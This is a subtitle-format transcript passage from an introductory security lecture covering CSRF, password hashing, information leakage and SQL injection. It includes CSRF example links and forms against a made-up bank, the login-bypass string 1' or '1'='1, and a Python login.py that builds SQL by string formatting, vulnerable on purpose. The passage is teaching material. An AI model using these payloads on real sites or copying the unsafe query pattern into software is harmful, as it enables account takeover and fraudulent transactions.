1111 00:59:28,167 --> 00:59:30,000 Now, there's another type of attack that can 1112 00:59:30,000 --> 00:59:34,800 be used that relies heavily on the fact that we use cookies so extensively, 1113 00:59:34,800 --> 00:59:40,650 and that is a cross-site request forgery, or a CSRF. 1114 00:59:40,650 --> 00:59:43,680 Now, cross-site scripting attacks generally 1115 00:59:43,680 --> 00:59:48,840 involve receiving some content and the client's browser 1116 00:59:48,840 --> 00:59:53,610 being tricked into doing something locally that it didn't want to do. 1117 00:59:53,610 --> 00:59:58,170 In a CSRF request, or CSRF attack, rather, 1118 00:59:58,170 --> 01:00:02,430 the trick is we're relying on the fact that there 1119 01:00:02,430 --> 01:00:04,980 is a cookie that can be exploited to make 1120 01:00:04,980 --> 01:00:11,595 an outbound request, an outbound HTTP request that we did not intend to make. 1121 01:00:11,595 --> 01:00:13,470 And again, this relies extensively on cookies 1122 01:00:13,470 --> 01:00:18,300 because they are this shorthand, short-form way to log into something. 1123 01:00:18,300 --> 01:00:22,230 And we can make a fraudulent request appear legitimate 1124 01:00:22,230 --> 01:00:24,480 if we can rely on someone's cookie. 1125 01:00:24,480 --> 01:00:28,110 Now, again, if you ever use a cloud service for example, 1126 01:00:28,110 --> 01:00:31,560 they're going to have CSRF defenses built into them. 1127 01:00:31,560 --> 01:00:33,780 This is really if you're building a simple site 1128 01:00:33,780 --> 01:00:35,368 and you don't defend against this. 1129 01:00:35,368 --> 01:00:38,160 Flask, for example, does not defend against this particularly well, 1130 01:00:38,160 --> 01:00:40,568 but Flask is a very simple web framework for servers. 1131 01:00:40,568 --> 01:00:43,110 They're generally going to be much more complicated than that 1132 01:00:43,110 --> 01:00:46,620 and have much more additional functionality to be more featureful.
1133 01:00:46,620 --> 01:00:48,840 So let's walk through what these cross-site request 1134 01:00:48,840 --> 01:00:50,280 forgeries might look like. 1135 01:00:50,280 --> 01:00:53,820 And for context, let's imagine that I send you an email 1136 01:00:53,820 --> 01:00:56,137 asking you to click on some URL. 1137 01:00:56,137 --> 01:00:57,720 So you're going to click on this link. 1138 01:00:57,720 --> 01:00:59,820 It's going to redirect you to some page. 1139 01:00:59,820 --> 01:01:02,310 Maybe that page looks something like this. 1140 01:01:02,310 --> 01:01:04,470 It's pretty simple, not much going on here. 1141 01:01:04,470 --> 01:01:05,320 I have a body. 1142 01:01:05,320 --> 01:01:07,500 And inside of it I have one more link. 1143 01:01:07,500 --> 01:01:15,422 And the link is http://hackbank.com/transfer?to=doug&amt=500. 1144 01:01:15,422 --> 01:01:18,630 Now, perhaps you don't hover over it and see the link at the beginning of it. 1145 01:01:18,630 --> 01:01:20,960 But maybe you are a customer of Hack Bank. 1146 01:01:20,960 --> 01:01:24,480 And maybe I know that you're a customer of Hack Bank such that if you click 1147 01:01:24,480 --> 01:01:28,290 on this link and if you happen to be logged in, and if you happen to have 1148 01:01:28,290 --> 01:01:32,730 your cookie set for hackbank.com, and this was the way that they actually 1149 01:01:32,730 --> 01:01:37,650 executed transfers, by having you go to /transfer and say to whom you want 1150 01:01:37,650 --> 01:01:40,200 to send money and in what amount-- 1151 01:01:40,200 --> 01:01:42,938 And fortunately, most banks don't actually do this.
1152 01:01:42,938 --> 01:01:46,230 Usually, if you're going to do something that manipulates the database, as this 1153 01:01:46,230 --> 01:01:48,938 would, because it's going to be transferring some amount of money 1154 01:01:48,938 --> 01:01:51,930 somewhere that would be via HTTP POST request-- 1155 01:01:51,930 --> 01:01:55,530 this is just a straightforward GET request I'm making here. 1156 01:01:55,530 --> 01:01:57,722 If you were logged in, though, to Hack Bank, 1157 01:01:57,722 --> 01:01:59,430 or if your cookie for Hack Bank was set 1158 01:01:59,430 --> 01:02:03,555 and you clicked on this link, hypothetically, a transfer of $500-- 1159 01:02:03,555 --> 01:02:05,430 again, assuming that this was how you did it, 1160 01:02:05,430 --> 01:02:07,740 you specified a person and you specified an amount-- 1161 01:02:07,740 --> 01:02:13,288 would be transferred from your account to presumably my account. 1162 01:02:13,288 --> 01:02:15,330 That's probably not something you intended to do. 1163 01:02:15,330 --> 01:02:18,867 So that would be an example of why this is a cross-site request forgery. 1164 01:02:18,867 --> 01:02:19,950 It's a legitimate request. 1165 01:02:19,950 --> 01:02:23,130 It appears that you intended to do this because it came from you. 1166 01:02:23,130 --> 01:02:24,330 It's using your cookie. 1167 01:02:24,330 --> 01:02:28,090 But you didn't actually intend for it to happen. 1168 01:02:28,090 --> 01:02:29,460 Here's another example. 1169 01:02:29,460 --> 01:02:32,260 You click on the link in my email and you get brought to this page. 1170 01:02:32,260 --> 01:02:35,250 So there's not actually even a second link to click anymore. 1171 01:02:35,250 --> 01:02:37,410 Now it's just trying to load an image. 1172 01:02:37,410 --> 01:02:40,660 Now, looking at this URL, we can tell there's not an image there. 1173 01:02:40,660 --> 01:02:43,920 It doesn't end in .jpeg or .png or the like. 1174 01:02:43,920 --> 01:02:45,540 It's the same URL as before.
1175 01:02:45,540 --> 01:02:49,397 But my browser sees image source equals something and says, 1176 01:02:49,397 --> 01:02:51,480 well, I'm at least going to try and go to that URL 1177 01:02:51,480 --> 01:02:55,040 and see if there is an image there to load for you. 1178 01:02:55,040 --> 01:02:57,710 Again, you just click on the link in the email. 1179 01:02:57,710 --> 01:03:00,140 This page loads. 1180 01:03:00,140 --> 01:03:03,320 My browser tries to go to this page, or your browser in this case 1181 01:03:03,320 --> 01:03:06,230 tries to go to this page to load the image there. 1182 01:03:06,230 --> 01:03:10,910 But in so doing, it's, again, executing this unintended transfer, 1183 01:03:10,910 --> 01:03:14,750 relying on your cookie at hackbank.com. 1184 01:03:14,750 --> 01:03:17,120 Another example of this might be a form. 1185 01:03:17,120 --> 01:03:20,120 So again, it appears that you click on the link in the email. 1186 01:03:20,120 --> 01:03:23,870 You get brought to a form that just has now just a button at the bottom of it 1187 01:03:23,870 --> 01:03:24,892 that says Click Here. 1188 01:03:24,892 --> 01:03:26,600 And the reason it just has a button, even 1189 01:03:26,600 --> 01:03:31,990 though there's other stuff written, is that those first two fields are hidden. 1190 01:03:31,990 --> 01:03:35,000 They are type equals hidden, which means you wouldn't actually 1191 01:03:35,000 --> 01:03:37,040 see them when you load your browser. 1192 01:03:37,040 --> 01:03:40,160 Now, contrast this, for example, with a field 1193 01:03:40,160 --> 01:03:43,340 whose type is text, which you might see if you're doing a straightforward 1194 01:03:43,340 --> 01:03:44,090 login. 1195 01:03:44,090 --> 01:03:48,020 You would type characters in and see the actual characters appear. 1196 01:03:48,020 --> 01:03:50,660 That's text versus a password field where you would 1197 01:03:50,660 --> 01:03:52,580 type characters in and see all stars. 
1198 01:03:52,580 --> 01:03:55,640 It would visually obscure what you typed. 1199 01:03:55,640 --> 01:03:58,760 The action of this form, or so to say where 1200 01:03:58,760 --> 01:04:02,313 the form-- what happens when you click on the Submit button at the bottom 1201 01:04:02,313 --> 01:04:03,230 is the same as before. 1202 01:04:03,230 --> 01:04:06,140 It's hackbank.com/transfer. 1203 01:04:06,140 --> 01:04:07,970 And then I'm using these parameters here; 1204 01:04:07,970 --> 01:04:13,550 to Doug, the amount of $500, Click Here. 1205 01:04:13,550 --> 01:04:17,090 Now notice also that I actually am using a POST request 1206 01:04:17,090 --> 01:04:19,500 to try to initiate this transfer, again, assuming 1207 01:04:19,500 --> 01:04:24,380 that this was how Hack Bank structured transfer requests in this way. 1208 01:04:24,380 --> 01:04:27,650 So if you clicked here and this was otherwise validly structured 1209 01:04:27,650 --> 01:04:31,340 and you were logged in, or your cookie was valid for Hack Bank, 1210 01:04:31,340 --> 01:04:33,800 then this would initiate a transfer of $500. 1211 01:04:33,800 --> 01:04:37,850 And I can play another similar trick to what I did a moment ago with the image 1212 01:04:37,850 --> 01:04:43,070 by doing something like this where, when the page is loaded, 1213 01:04:43,070 --> 01:04:44,435 instantly submit this form. 1214 01:04:44,435 --> 01:04:46,310 So you don't even have to click here anymore. 1215 01:04:46,310 --> 01:04:47,630 It's just going to go through the document, 1216 01:04:47,630 --> 01:04:50,780 document being JavaScript's way of referring to the entire web page, 1217 01:04:50,780 --> 01:04:53,600 find the first form, forms[0], assuming 1218 01:04:53,600 --> 01:04:57,380 this is the first form on the page, and just submit it. 1219 01:04:57,380 --> 01:04:59,840 Doesn't matter what else is going on. 1220 01:04:59,840 --> 01:05:00,860 Just submit this form.
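The lecture does not show a defense against these forged forms, but one widely used idea can be sketched in a few lines of Python: the server stores a random secret token in the user's session and embeds it in its own genuine forms, then rejects any POST that does not send the same token back. A page on another site can cause your cookie to be sent, but it has no way to read that token. The names new_csrf_token, is_valid_csrf, and the session dictionary here are hypothetical stand-ins, not part of any particular framework.

```python
import hmac
import secrets


def new_csrf_token():
    """Generate an unguessable token to store in the user's session."""
    return secrets.token_urlsafe(32)


def is_valid_csrf(session_token, submitted_token):
    """Accept the request only if the form sent back the session's token."""
    if not session_token or not submitted_token:
        return False
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(session_token, submitted_token)


# Hypothetical session for a logged-in user.
session = {"csrf_token": new_csrf_token()}

# A genuine form from the bank includes the token; a forged one cannot.
legit = is_valid_csrf(session["csrf_token"], session["csrf_token"])
forged = is_valid_csrf(session["csrf_token"], None)
print(legit, forged)
```

Under these assumptions the auto-submitting form would still reach the server with your cookie attached, but the transfer would be refused because the hidden token field is missing or wrong.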
1221 01:05:00,860 --> 01:05:06,110 That would also initiate transfer if you clicked on that link from my email. 1222 01:05:06,110 --> 01:05:10,010 So a quick summary of these two different types of attacks. 1223 01:05:10,010 --> 01:05:12,740 Cross-site scripting attacks, the adversary 1224 01:05:12,740 --> 01:05:16,940 tricks you into executing code on your browser to do something locally 1225 01:05:16,940 --> 01:05:19,070 that you probably did not intend. 1226 01:05:19,070 --> 01:05:22,280 And a cross-site request forgery, something 1227 01:05:22,280 --> 01:05:27,320 that appears to be a legitimate request from your browser 1228 01:05:27,320 --> 01:05:31,220 because it's relying on cookies, you're ostensibly logged in in that way, 1229 01:05:31,220 --> 01:05:35,670 but you don't actually mean to make that request. 1230 01:05:35,670 --> 01:05:37,670 Now let's talk about a couple of vulnerabilities 1231 01:05:37,670 --> 01:05:40,340 that exist in the context of a database, which I 1232 01:05:40,340 --> 01:05:42,600 know you've discussed recently as well. 1233 01:05:42,600 --> 01:05:46,170 So imagine that I have a table of users on my database 1234 01:05:46,170 --> 01:05:49,580 that looks like this, that each of them has an ID number, they have a username, 1235 01:05:49,580 --> 01:05:51,170 and they have a password. 1236 01:05:51,170 --> 01:05:53,630 Now, the obvious vulnerability here is I really 1237 01:05:53,630 --> 01:05:57,800 shouldn't be storing my users' passwords like this in the clear. 1238 01:05:57,800 --> 01:06:01,370 If somebody were to ever hack and get a hold of this database file, 1239 01:06:01,370 --> 01:06:03,020 that's really, really bad. 1240 01:06:03,020 --> 01:06:08,740 I am not taking best practices to protect my customers' information. 1241 01:06:08,740 --> 01:06:09,990 So I want to avoid doing that.
1242 01:06:09,990 --> 01:06:14,060 So instead what I might do, as we've discussed, is hash their passwords, 1243 01:06:14,060 --> 01:06:17,540 run them through some hash function so that when they're actually stored, 1244 01:06:17,540 --> 01:06:19,880 they get stored looking something like this. 1245 01:06:19,880 --> 01:06:23,120 You have no idea what the original password was. 1246 01:06:23,120 --> 01:06:25,050 And because it's a hash, it's irreversible. 1247 01:06:25,050 --> 01:06:28,280 You should not be able to undo what I did 1248 01:06:28,280 --> 01:06:30,390 when I ran through the hash function. 1249 01:06:30,390 --> 01:06:33,560 But there's actually still a vulnerability here. 1250 01:06:33,560 --> 01:06:35,840 And the vulnerability here is not technical. 1251 01:06:35,840 --> 01:06:38,570 It's human again. 1252 01:06:38,570 --> 01:06:41,785 And the vulnerability that exists here is that we see-- 1253 01:06:41,785 --> 01:06:43,910 we're using a hash function, so it's deterministic. 1254 01:06:43,910 --> 01:06:47,300 When we pass some data through it, we're going to get the same output every time 1255 01:06:47,300 --> 01:06:48,810 we pass data through it. 1256 01:06:48,810 --> 01:06:53,900 And two of our users, Charlie and Eric, have the same hash. 1257 01:06:53,900 --> 01:06:56,390 We saw this makes sense, because if we go back a moment, 1258 01:06:56,390 --> 01:06:59,840 they also had the same actual password when it was stored in plain text. 1259 01:06:59,840 --> 01:07:03,530 We've gone out of our way to try and defend against that by hashing it. 1260 01:07:03,530 --> 01:07:06,860 But somebody who gets a hold of this database file, for example, 1261 01:07:06,860 --> 01:07:11,750 they hack into it, they get it, they'll see two people have the same password. 1262 01:07:11,750 --> 01:07:14,540 And maybe this is a very small subset of my user base. 1263 01:07:14,540 --> 01:07:17,150 And maybe there's hundreds of thousands of people. 
1264 01:07:17,150 --> 01:07:20,720 And maybe 10% of them all have the same hash. 1265 01:07:20,720 --> 01:07:26,670 Well, again, human beings, we are not the best at defending our own stuff. 1266 01:07:26,670 --> 01:07:29,090 It's a sad truth that the most common password 1267 01:07:29,090 --> 01:07:32,997 is password followed by some of these other examples we had a second ago. 1268 01:07:32,997 --> 01:07:34,580 All of these are pretty bad passwords. 1269 01:07:34,580 --> 01:07:38,990 They're all on the list of some of the most commonly used passwords 1270 01:07:38,990 --> 01:07:42,920 for all services, which means that if you see a hash like this, 1271 01:07:42,920 --> 01:07:45,620 it doesn't matter that we have taken steps 1272 01:07:45,620 --> 01:07:49,130 to protect our users against this. 1273 01:07:49,130 --> 01:07:55,700 If we see a hash like this many, many times in our database, a clever hacker, 1274 01:07:55,700 --> 01:07:58,732 a clever adversary might think, oh, well, 1275 01:07:58,732 --> 01:08:00,440 I'm seeing this password 10% of the time, 1276 01:08:00,440 --> 01:08:04,400 so I'm going to guess that Charlie's password for the service is 12345 1277 01:08:04,400 --> 01:08:05,330 and they're wrong. 1278 01:08:05,330 --> 01:08:08,480 And then they'll maybe try abcdef and they're wrong, and then maybe try 1279 01:08:08,480 --> 01:08:10,520 password and they're right. 1280 01:08:10,520 --> 01:08:13,910 And then all of a sudden every time they see that hash, they 1281 01:08:13,910 --> 01:08:18,090 can assume that the password is password for every single one of those users. 1282 01:08:18,090 --> 01:08:24,960 So again, nothing we can do as technologists to solve this problem. 1283 01:08:24,960 --> 01:08:29,510 This is really just getting folks to understand 1284 01:08:29,510 --> 01:08:33,276 that using different passwords, using non-standard passwords, 1285 01:08:33,276 --> 01:08:34,109 is really important. 
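The guessing attack just described can be sketched in Python. This is only an illustration under stated assumptions: the lecture does not say which hash function is used, so SHA-256 from the standard library stands in for it, and the user table and the helper name hash_password are made up for the example. The point it shows is that a deterministic hash maps equal passwords to equal hashes, so one correct guess exposes every user who shares that hash.

```python
import hashlib


def hash_password(password):
    """Deterministic hash: the same input always yields the same output."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Hypothetical stolen table: only usernames and hashes are visible.
stored = {
    "alice": hash_password("kQ7#vT2m"),
    "charlie": hash_password("password"),
    "eric": hash_password("password"),
}

# The adversary tries common passwords against one repeated hash.
guesses = ["12345", "abcdef", "password"]
target = stored["charlie"]
cracked = next((g for g in guesses if hash_password(g) == target), None)

# Every account sharing that hash is now known to use the same password.
exposed = sorted(user for user, h in stored.items() if h == target)
print(cracked, exposed)
```

Alice's entry is unaffected here simply because her password is not on the adversary's list of common guesses.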
1286 01:08:34,109 --> 01:08:37,067 That's why we talked about password managers and maybe not even knowing 1287 01:08:37,067 --> 01:08:41,160 your own passwords in a prior lecture. 1288 01:08:41,160 --> 01:08:45,140 There's another problem that can exist, though, with databases, in particular, 1289 01:08:45,140 --> 01:08:47,120 when we see screens like this. 1290 01:08:47,120 --> 01:08:51,560 So this is a contrived login screen that has a username and password 1291 01:08:51,560 --> 01:08:55,220 field and a Forgot Password button whose purpose in life 1292 01:08:55,220 --> 01:08:59,149 is, if you type in your email address and you-- 1293 01:08:59,149 --> 01:09:01,189 which is the username in this case, and you 1294 01:09:01,189 --> 01:09:05,510 have the Forgot Password box checked, and you try and click login, 1295 01:09:05,510 --> 01:09:09,418 instead of actually logging you in, it's going to email you, hopefully, 1296 01:09:09,418 --> 01:09:11,960 a link to your password, not your actual password for reasons 1297 01:09:11,960 --> 01:09:14,970 we previously discussed as well. 1298 01:09:14,970 --> 01:09:20,640 But what if when we click on this button we see this? 1299 01:09:20,640 --> 01:09:22,310 OK. 1300 01:09:22,310 --> 01:09:25,520 We've emailed you a link to change your password. 1301 01:09:25,520 --> 01:09:29,660 Does that seem inherently problematic? 1302 01:09:29,660 --> 01:09:30,479 Perhaps not. 1303 01:09:30,479 --> 01:09:34,600 But what about if you see this as well? 1304 01:09:34,600 --> 01:09:37,100 Somebody might see this if they're logged in as well. 1305 01:09:37,100 --> 01:09:40,490 Sorry, no user with that email address. 1306 01:09:40,490 --> 01:09:44,870 Does that perhaps seem problematic when you compare it against this? 1307 01:09:44,870 --> 01:09:48,350 This is an example of something called information leakage.
1308 01:09:48,350 --> 01:09:51,710 Perhaps an adversary has hacked some other database 1309 01:09:51,710 --> 01:09:55,040 where folks were not being as secure with credentials. 1310 01:09:55,040 --> 01:09:58,970 And so they have a whole set of email addresses mapped to credentials. 1311 01:09:58,970 --> 01:10:02,570 And because human beings tend to reuse the same credentials 1312 01:10:02,570 --> 01:10:06,650 on multiple different services, they are trying different services 1313 01:10:06,650 --> 01:10:09,170 that they believe that these users might also 1314 01:10:09,170 --> 01:10:13,550 use using those same username and password combinations. 1315 01:10:13,550 --> 01:10:18,860 If this is the way that we field these types of forgot password inquiries, 1316 01:10:18,860 --> 01:10:22,130 we're revealing some information potentially. 1317 01:10:22,130 --> 01:10:27,650 If Alice is a user, we're now saying, yes, Alice is a user of this. 1318 01:10:27,650 --> 01:10:29,300 Try this password. 1319 01:10:29,300 --> 01:10:34,490 If we get something like this, then the adversary might not bother trying. 1320 01:10:34,490 --> 01:10:37,820 They've realized, oh, Alice is not a user of this service. 1321 01:10:37,820 --> 01:10:41,720 And even if they're not trying to hack into it, if we do something like this, 1322 01:10:41,720 --> 01:10:45,230 we're also telling that adversary quite a bit about Alice. 1323 01:10:45,230 --> 01:10:49,340 Now we know Alice uses this service, and this service, and this service, 1324 01:10:49,340 --> 01:10:50,600 and not this service. 1325 01:10:50,600 --> 01:10:54,050 And they can sort of create a picture of who Alice might be. 1326 01:10:54,050 --> 01:11:00,398 They're sort of using her digital footprint to understand more about her. 1327 01:11:00,398 --> 01:11:03,190 A better response in this case might be to say something like this, 1328 01:11:03,190 --> 01:11:04,550 request received. 
1329 01:11:04,550 --> 01:11:07,702 If you're in our system, you'll receive an email with instructions shortly. 1330 01:11:07,702 --> 01:11:09,410 That's not tipping our hand either way as 1331 01:11:09,410 --> 01:11:12,890 to whether the user is in the database or not in the database. 1332 01:11:12,890 --> 01:11:15,860 No information leakage here, and generally a better way 1333 01:11:15,860 --> 01:11:19,610 to protect our customers' privacy. 1334 01:11:19,610 --> 01:11:22,850 Now, that's not the only problem that we can have with databases. 1335 01:11:22,850 --> 01:11:25,610 We've alluded to this idea of SQL injection. 1336 01:11:25,610 --> 01:11:28,100 And there's this comic that makes the rounds quite a bit 1337 01:11:28,100 --> 01:11:30,620 when we talk about SQL injection from a web comic called 1338 01:11:30,620 --> 01:11:35,240 XKCD that involves a SQL injection attack, which is basically 1339 01:11:35,240 --> 01:11:39,080 providing some information that-- 1340 01:11:39,080 --> 01:11:42,670 or providing some text or some query that we want to make to a database 1341 01:11:42,670 --> 01:11:46,690 where that query actually does something unintended. 1342 01:11:46,690 --> 01:11:50,700 It actually itself is SQL as opposed to just plugging in some parameter, 1343 01:11:50,700 --> 01:11:53,750 like what is your name, and then searching the database for that name. 1344 01:11:53,750 --> 01:11:55,708 Instead of giving you my name, I might give you 1345 01:11:55,708 --> 01:11:58,040 something that is actually a SQL query that's 1346 01:11:58,040 --> 01:12:01,050 going to be executed that you don't want me to execute. 1347 01:12:01,050 --> 01:12:03,750 So let's see an example of how this might work. 1348 01:12:03,750 --> 01:12:07,800 So here's another simple username and password field.
1349 01:12:07,800 --> 01:12:11,580 And in this example, I've written my password field poorly intentionally 1350 01:12:11,580 --> 01:12:14,000 for purposes of the example so that it will actually 1351 01:12:14,000 --> 01:12:16,970 show you the text that is typed as opposed to showing 1352 01:12:16,970 --> 01:12:19,640 you stars like a password field should. 1353 01:12:19,640 --> 01:12:23,300 So this is something that the user sees when they access my site. 1354 01:12:23,300 --> 01:12:26,718 And perhaps on the back end in the server-side code, inside of Python 1355 01:12:26,718 --> 01:12:29,510 somewhere I have written a SQL query that looks like the following. 1356 01:12:29,510 --> 01:12:35,540 When the login button is clicked, execute the following SQL query. 1357 01:12:35,540 --> 01:12:40,040 SELECT star from users where username equals uname-- 1358 01:12:40,040 --> 01:12:45,230 and uname here in yellow referring to whatever was typed in this box-- 1359 01:12:45,230 --> 01:12:48,050 and password equals pword, where, again, pword 1360 01:12:48,050 --> 01:12:51,140 is referring to whatever was typed in this box. 1361 01:12:51,140 --> 01:12:54,120 So we're doing a SQL query to select star from users, 1362 01:12:54,120 --> 01:12:57,360 get all of the information from the users table 1363 01:12:57,360 --> 01:13:01,170 where the username equals whatever they typed in that box 1364 01:13:01,170 --> 01:13:05,560 and the password equals whatever they typed in that box. 1365 01:13:05,560 --> 01:13:07,410 And so, for example, if I have somebody who 1366 01:13:07,410 --> 01:13:09,810 logs in with the username Alice and the password 1367 01:13:09,810 --> 01:13:14,580 12345, what the query would actually look like with these values plugged 1368 01:13:14,580 --> 01:13:19,920 into it might look something like this; SELECT star from users where username 1369 01:13:19,920 --> 01:13:25,200 equals Alice and password equals 12345. 
1370 01:13:25,200 --> 01:13:30,420 If there is nobody with username Alice or Alice's password is not 12345, 1371 01:13:30,420 --> 01:13:31,770 then this will fail. 1372 01:13:31,770 --> 01:13:34,890 Both of those conditions need to be true. 1373 01:13:34,890 --> 01:13:37,890 But what about this? 1374 01:13:37,890 --> 01:13:46,800 Someone whose username is hacker and their password is 1' or '1' equals '1. 1375 01:13:46,800 --> 01:13:49,800 1376 01:13:49,800 --> 01:13:51,848 That looks pretty weird. 1377 01:13:51,848 --> 01:13:53,640 And the reason that that looks pretty weird 1378 01:13:53,640 --> 01:13:57,390 is because this is an attempt to inject SQL, 1379 01:13:57,390 --> 01:14:02,820 to trick SQL into doing something that is presumably not intended by the code 1380 01:14:02,820 --> 01:14:04,050 that we wrote. 1381 01:14:04,050 --> 01:14:07,980 Now, it probably helps to take a look at it plugging the data in 1382 01:14:07,980 --> 01:14:11,580 to see what exactly this is going to do. 1383 01:14:11,580 --> 01:14:16,270 SELECT star from users where username equals hacker or-- 1384 01:14:16,270 --> 01:14:23,190 excuse me, and password equals '1' or and so on and so on. 1385 01:14:23,190 --> 01:14:26,880 1386 01:14:26,880 --> 01:14:30,180 Maybe I do have a person whose username actually is hacker, 1387 01:14:30,180 --> 01:14:33,000 but that's probably not their password. 1388 01:14:33,000 --> 01:14:34,050 That doesn't matter. 1389 01:14:34,050 --> 01:14:37,350 I'm still going to be able to log in if I 1390 01:14:37,350 --> 01:14:39,140 have somebody whose username is hacker. 1391 01:14:39,140 --> 01:14:41,850 And the reason for that is because of this or. 1392 01:14:41,850 --> 01:14:45,780 I have sort of short circuited the end of the SQL query. 1393 01:14:45,780 --> 01:14:50,370 I have this quote mark that demarcates the end of what the user presumably 1394 01:14:50,370 --> 01:14:51,780 typed in. 
1395 01:14:51,780 --> 01:14:54,660 But I've actually literally typed those into my password 1396 01:14:54,660 --> 01:14:59,060 to trick SQL such that if hacker's password equals 1, 1397 01:14:59,060 --> 01:15:03,420 it just happens to literally be the character 1, OK, I have succeeded. 1398 01:15:03,420 --> 01:15:05,250 I guess that's a really bad password, and I 1399 01:15:05,250 --> 01:15:08,100 shouldn't be able to log in that way, but maybe that is the case 1400 01:15:08,100 --> 01:15:09,060 and I'm able to log in. 1401 01:15:09,060 --> 01:15:13,560 But even if not, this other thing is true. 1402 01:15:13,560 --> 01:15:18,660 '1' does equal '1'. 1403 01:15:18,660 --> 01:15:23,030 So as long as somebody whose username is hacker exists in the database, 1404 01:15:23,030 --> 01:15:27,330 I am now able to log in as hacker because this is true. 1405 01:15:27,330 --> 01:15:29,230 This part's probably not true, right? 1406 01:15:29,230 --> 01:15:31,860 It's unlikely that their password is 1. 1407 01:15:31,860 --> 01:15:36,960 Regardless of what their password is, this part actually is true. 1408 01:15:36,960 --> 01:15:40,200 It's a very simple SQL injection attack. 1409 01:15:40,200 --> 01:15:44,490 I'm basically logging in as someone who I'm presumably not supposed 1410 01:15:44,490 --> 01:15:48,780 to be able to log in as, but it illustrates the kind of thing 1411 01:15:48,780 --> 01:15:50,550 that could happen. 1412 01:15:50,550 --> 01:15:54,450 You are allowing people to bypass logins. 1413 01:15:54,450 --> 01:15:59,100 Now, it could get worse if your database administrator username 1414 01:15:59,100 --> 01:16:01,710 is admin or something very common. 1415 01:16:01,710 --> 01:16:04,683 The default for this is typically admin.
1416 01:16:04,683 --> 01:16:06,600 This would potentially give people the ability 1417 01:16:06,600 --> 01:16:08,760 to be database administrators, that they're 1418 01:16:08,760 --> 01:16:14,370 able to execute exactly this kind of trick on the admin user. 1419 01:16:14,370 --> 01:16:16,830 Now they have administrative access to your database, which 1420 01:16:16,830 --> 01:16:19,580 means they can do things like manipulate the data in the database, 1421 01:16:19,580 --> 01:16:23,350 change things, add things, delete things that you don't want to have deleted. 1422 01:16:23,350 --> 01:16:28,170 And in the case of a database, deletion is pretty permanent. 1423 01:16:28,170 --> 01:16:32,580 You can't undo a delete most of the time in a database 1424 01:16:32,580 --> 01:16:35,890 as the way you might be able to do with other files. 1425 01:16:35,890 --> 01:16:38,430 Now, are there techniques to avoid this kind of attack? 1426 01:16:38,430 --> 01:16:40,108 Fortunately, there are. 1427 01:16:40,108 --> 01:16:42,900 Right now I'd like just to just take a look at a very simple Python 1428 01:16:42,900 --> 01:16:45,720 program that replicates the kind of thing 1429 01:16:45,720 --> 01:16:50,080 that one could do in a more robust, more complex SQL situation. 1430 01:16:50,080 --> 01:16:52,080 So let's pull up a program here where we're just 1431 01:16:52,080 --> 01:16:54,870 simulating this idea of a SQL injection just 1432 01:16:54,870 --> 01:17:00,230 to show you how it's not that difficult to defend against it. 1433 01:17:00,230 --> 01:17:03,840 So let's pull up the code here in this file login.py. 1434 01:17:03,840 --> 01:17:06,060 So there's not that much going on here. 1435 01:17:06,060 --> 01:17:07,950 I have x equals input username. 1436 01:17:07,950 --> 01:17:10,920 So x, recall, is a Python variable. 
1437 01:17:10,920 --> 01:17:14,460 And input username is basically going to prompt the user with the string 1438 01:17:14,460 --> 01:17:17,405 username and then expect them to type something after that. 1439 01:17:17,405 --> 01:17:19,530 And then we do exactly the same thing with password 1440 01:17:19,530 --> 01:17:21,270 except storing the result there in y. 1441 01:17:21,270 --> 01:17:24,000 So whatever the user types after username will get stored in x. 1442 01:17:24,000 --> 01:17:27,270 Whatever they type after password will get stored in y. 1443 01:17:27,270 --> 01:17:29,030 And then here I'm just going to print. 1444 01:17:29,030 --> 01:17:33,310 And in the SQL context, this would be the query that actually gets executed. 1445 01:17:33,310 --> 01:17:35,610 So imagine that that's what's happening instead. 1446 01:17:35,610 --> 01:17:39,850 SELECT star from users where username equals and then this symbol here, 1447 01:17:39,850 --> 01:17:40,350 '{x}'. 1448 01:17:40,350 --> 01:17:44,180 1449 01:17:44,180 --> 01:17:46,680 What I'm doing here is just using a Python-formatted string. 1450 01:17:46,680 --> 01:17:48,560 That's what this f here-- it's not a typo-- 1451 01:17:48,560 --> 01:17:51,810 at the beginning means, is I'm going to plug in whatever the person, the user, 1452 01:17:51,810 --> 01:17:55,640 typed at the first prompt, which I stored in x here, 1453 01:17:55,640 --> 01:17:59,933 and whatever the user typed at the second prompt, which is stored in y there. 1454 01:17:59,933 --> 01:18:01,600 So let's actually just run this program. 1455 01:18:01,600 --> 01:18:03,980 So let's pop open here for a second. 1456 01:18:03,980 --> 01:18:07,780 The name of this program is login.py, so I'm going to type python 1457 01:18:07,780 --> 01:18:10,880 login.py, Enter. 1458 01:18:10,880 --> 01:18:13,290 Username, Doug. 1459 01:18:13,290 --> 01:18:16,308 Password, 12345.
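The login.py program described above might look roughly like the following. This is a reconstruction from the spoken description rather than the file shown on screen: the lecture reads x and y with input(), whereas this sketch wraps the same f-string in a function named build_query (a made-up name) so that the two cases from the lecture can be printed side by side.

```python
def build_query(x, y):
    # The user's text is dropped straight between the single quotes,
    # exactly as the f-string in the lecture does.
    return f"SELECT * FROM users WHERE username = '{x}' AND password = '{y}'"


# An ordinary login attempt.
print(build_query("Doug", "12345"))

# The injection attempt: the typed quote closes the string early,
# so OR '1' = '1' becomes part of the SQL itself.
print(build_query("Doug", "1' OR '1' = '1"))
```

The second printed query ends with a condition that is always true, which is why the password check no longer matters.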
1460 01:18:16,308 --> 01:18:19,600 And then the query, hypothetically, that would get executed if I constructed it 1461 01:18:19,600 --> 01:18:22,480 in this way is SELECT star from users where username 1462 01:18:22,480 --> 01:18:25,210 equals Doug and password equals 12345. 1463 01:18:25,210 --> 01:18:26,320 Seems reasonable. 1464 01:18:26,320 --> 01:18:30,130 But if I try and do the adversary thing that I did a moment ago, 1465 01:18:30,130 --> 01:18:38,380 username equals Doug, password equals 1' or '1' equals '1, not 1466 01:18:38,380 --> 01:18:42,850 a final single quote, and I hit Enter, then I end up with SELECT star 1467 01:18:42,850 --> 01:18:49,865 from users where username equals Doug and password equals 1 or 1 equals 1. 1468 01:18:49,865 --> 01:18:52,000 And the latter part of that is true. 1469 01:18:52,000 --> 01:18:53,890 The former part is false. 1470 01:18:53,890 --> 01:18:56,860 But it's good enough that I would be able to log in 1471 01:18:56,860 --> 01:18:59,650 if I did something like that. 1472 01:18:59,650 --> 01:19:02,200 But we want to try and get around that. 1473 01:19:02,200 --> 01:19:05,200 So now let's take a look at a second file that might solve this problem. 1474 01:19:05,200 --> 01:19:11,380 So I'm going to open up login2.py in my editor here. 1475 